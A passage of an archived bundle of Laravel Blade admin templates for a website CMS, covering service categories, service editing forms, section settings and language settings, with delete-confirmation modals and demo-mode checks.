class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive nowrap w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.category_name') }}</th> <th>{{ __('content.order') }}</th> <th>{{ __('content.status') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($categories); $asc=0; @endphp @foreach ($categories as $category) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $category->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $category->category_name }}</td> <td>{{ $category->order }}</td> <td> @if($category->status == 0) <span class="badge badge-danger">{{ __('content.disable') }}</span> @else <span class="badge badge-success">{{ __('content.enable') }}</span> @endif </td> <td> <div> <a href="{{ route('service-category.edit', $category->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModel{{ $category->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModel{{ $category->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('service-category.destroy', $category->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="categoryModal" tabindex="-1" role="dialog" aria-labelledby="categoryModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="categoryModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('service-category.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="category_name">{{ __('content.category_name') }} <span class="text-red">*</span></label> <input type="text" name="category_name" class="form-control" id="category_name" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select name="status" class="form-control" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1">{{ __('content.enable') }}</option> <option value="0">{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/service/category/edit.blade.php���������������������������������������������������������0000644�����������������00000006444�14765366573�0015010 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_category') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('service-category.update', $category->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="category_name">{{ __('content.category_name') }} <span class="text-red">*</span></label> <input type="text" name="category_name" class="form-control" id="category_name" value="{{ $category->category_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $category->order }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select class="form-control" name="status" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1" {{ $category->status == 1 ? 'selected' : '' }}>{{ __('content.enable') }}</option> <option value="0" {{ $category->status == 0 ? 'selected' : '' }}>{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/service/index.blade.php�����������������������������������������������������������������0000644�����������������00000063547�14765366573�0013364 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title mb-0">{{ __('content.services') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('service.index', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/service-'.$style.'.jpg') }}" alt="draft image"> </div> </h4> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#serviceSectionModal">{{ __('content.section_title_and_description') }}</button> <a href="{{ url('admin/service/create/'.$style) }}" class="btn btn-primary float-right mb-3">+ {{ __('content.add_service') }}</a> </div> </div> @if (count($services) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('service.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.additional_features') }}</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.category_name') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($services); $asc=0; @endphp @foreach ($services as $service) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $service->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td> <div class="btn-group"> <button type="button" class="btn btn-primary dropdown-toggle" data-toggle="dropdown" aria-expanded="false">{{ __('content.select') }}</button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('service-content.create', $service->id) }}">{{ __('content.service_content') }}</a> <a class="dropdown-item" href="{{ route('service-info.create', $service->id) }}">{{ __('content.service_info') }}</a> <a class="dropdown-item" href="{{ route('service-feature.create', $service->id) }}">{{ __('content.service_features') }}</a> </div> </div> </td> <td>{{ $service->title }}</td> <td>{{ $service->category_name }}</td> <td>{{ $service->order }}</td> <td> <div> <a href="{{ route('service.edit', $service->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $service->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $service->id }}" tabindex="-1" role="dialog" aria-labelledby="counterModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="counterModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('service.destroy', $service->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="serviceSectionModal" tabindex="-1" role="dialog" aria-labelledby="serviceSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="serviceSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($service_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('service-section.update', $service_section->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title" value="{{ $service_section->section_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $service_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name" value="{{ $service_section->button_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }}</label> <input type="text" name="button_url" class="form-control" id="button_url" value="{{ $service_section->button_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_item">{{ __('content.section_item') }}</label> <input type="number" name="section_item" class="form-control" id="section_item" value="{{ $service_section->section_item }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="paginate_item">{{ __('content.paginate_item') }}</label> <input type="number" name="paginate_item" class="form-control" id="paginate_item" value="{{ $service_section->paginate_item }}"> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#serviceSectionDestroyModal{{ $service_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="serviceSectionDestroyModal{{ $service_section->id }}" tabindex="-1" role="dialog" aria-labelledby="serviceSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="serviceSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('service-section.destroy', $service_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('service-section.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }}</label> <input type="text" name="button_url" class="form-control" id="button_url"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_item">{{ __('content.section_item') }}</label> <input type="number" name="section_item" class="form-control" id="section_item" value="6"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="paginate_item">{{ __('content.paginate_item') }}</label> <input type="number" name="paginate_item" class="form-control" id="paginate_item" value="12"> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ���������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/service/edit.blade.php������������������������������������������������������������������0000644�����������������00000046276�14765366573�0013202 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_service') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.select') }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('service-content.create', $service->id) }}">{{ __('content.service_content') }}</a> <a class="dropdown-item" href="{{ route('service-info.create', $service->id) }}">{{ __('content.service_info') }}</a> <a class="dropdown-item" href="{{ route('service-feature.create', $service->id) }}">{{ __('content.service_features') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/service-style1.jpg') }}" alt="draft image"> </div> </h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('service.update', $service->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $service->style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} <span class="text-red">*</span></label> <input type="text" name="title" class="form-control" id="title" value="{{ $service->title }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="category">{{ __('content.categories') }} <span class="text-red">*</span></label> <select class="form-control" name="category_id" id="category" required> @foreach ($categories as $category) <option value="{{ $category->id}}" {{ $category->id == $service->category_id ? 'selected' : '' }}>{{ $category->category_name }}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="short_description">{{ __('content.short_description') }}</label> <textarea type="text" name="short_description" class="form-control" id="short_description" rows="3">{{ $service->short_description }}</textarea> </div> </div> <div class="col-md-12"> <fieldset class="form-group"> <legend class="font-14">{{ __('content.type') }}</legend> <div class="form-check pl-0 mb-2"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-2" name="type" id="optionsRadios1" onclick="showHideTypeDiv()" value="icon" {{ $service->type == 'icon' ? 'checked' : '' }}><span class="ml-3">{{ __('content.icon') }}</span> <i class="input-helper"></i> </label> </div> <div class="form-check pl-0"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-1" name="type" id="optionsRadios2" onclick="showHideTypeDiv()" value="image" {{ $service->type == 'image' ? 'checked' : '' }}><span class="ml-3">{{ __('content.image') }}</span> <i class="input-helper"></i> </label> </div> </fieldset> <div class="form-group" id="icon-type" style="{{ $service->type == 'icon' ? 'display:block' : 'display:none' }}"> <label for="icon" class="d-block">{{ __('content.icon') }}</label> <div class="btn-group"> <input type="hidden" name="icon" class="form-control" id="icon" value="{{ $service->icon }}"> <button type="button" class="btn btn-primary iconpicker-component"><i id="icon-value" class="{{ $service->icon }} iconpicker-component"></i></button> <button type="button" id="iconPickerBtn" class="icp icp-dd btn btn-primary dropdown-toggle iconpicker-component" data-selected="fa-car" data-toggle="dropdown"> <span class="caret"></span> </button> <div class="dropdown-menu"></div> </div> </div> <div id="image-type" style="{{ $service->type == 'image' ? 'display:block' : 'display:none' }}"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 64 x 64) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($service->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/service/'.$service->section_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($service->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $service->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_image_2">{{ __('content.thumbnail') }} ({{ __('content.size') }} 600 x 600) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image_2" class="form-control-file" id="section_image_2"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($service->section_image_2)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/service/'.$service->section_image_2) }}" alt="image" class="rounded w-25"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($service->section_image_2)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal2{{ $service->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }} </label> <input id="button_name" name="button_name" type="text" class="form-control" value="{{ $service->button_name }}"> <small class="form-text text-muted">{{ __('content.when_you_leave_this_section_blank_it_will_go_to_its_own_detail_page') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }} </label> <input id="button_url" name="button_url" type="text" class="form-control" value="{{ $service->button_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $service->order }}"> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published" {{ $service->status == 'published' ? 'selected' : '' }}>{{ __('content.published') }}</option> <option value="draft" {{ $service->status == 'draft' ? 'selected' : '' }}>{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $service->id }}" tabindex="-1" role="dialog" aria-labelledby="deleteImageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteImageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('service.destroy_image', $service->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="deleteImageModal2{{ $service->id }}" tabindex="-1" role="dialog" aria-labelledby="deleteImageModal2CenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteImageModal2CenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('service.destroy_image_2', $service->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> </div> </div> </div> <!-- end row --> @endsection ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/language/create.blade.php���������������������������������������������������������������0000644�����������������00000032361�14765366573�0013631 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.languages') }}</h6> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('language.update_language') }}" method="POST"> @method('PATCH') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="language_id">{{ __('content.default_site_language') }}</label> <select class="form-control" name="language_id" id="language_id" required> @foreach ($languages as $lang) <option value="{{ $lang->id }}" {{ $lang->default_site_language == 1 ? 'selected' : '' }}>{{ $lang->language_name }}</option> @endforeach @php unset($lang); @endphp </select> </div> </div> <div class="col-12"> <button type="submit" class="btn btn-primary"> {{ __('content.submit') }} </button> </div> </div> </form> </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.languages') }}</h6> <div> <button type="button" class="btn btn-primary float-right mb-3" data-toggle="modal" data-target="#languageModal">+ {{ __('content.add_language') }}</button> </div> </div> @if (count($languages) > 0) <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.language_name') }}</th> <th>{{ __('content.language_code') }}</th> <th>{{ __('content.direction') }}</th> <th>{{ __('content.keywords') }}</th> <th>{{ __('content.display_dropdown') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $i = 1; @endphp @foreach ($languages as $language) <tr> <td>{{ $i++ }}</td> <td>{{ $language->language_name }}</td> <td>{{ $language->language_code }}</td> <td> @if ($language->direction == 0) <span class="badge badge-pill badge-success-lighten">{{ __('ltr') }}</span> @else <span class="badge badge-pill 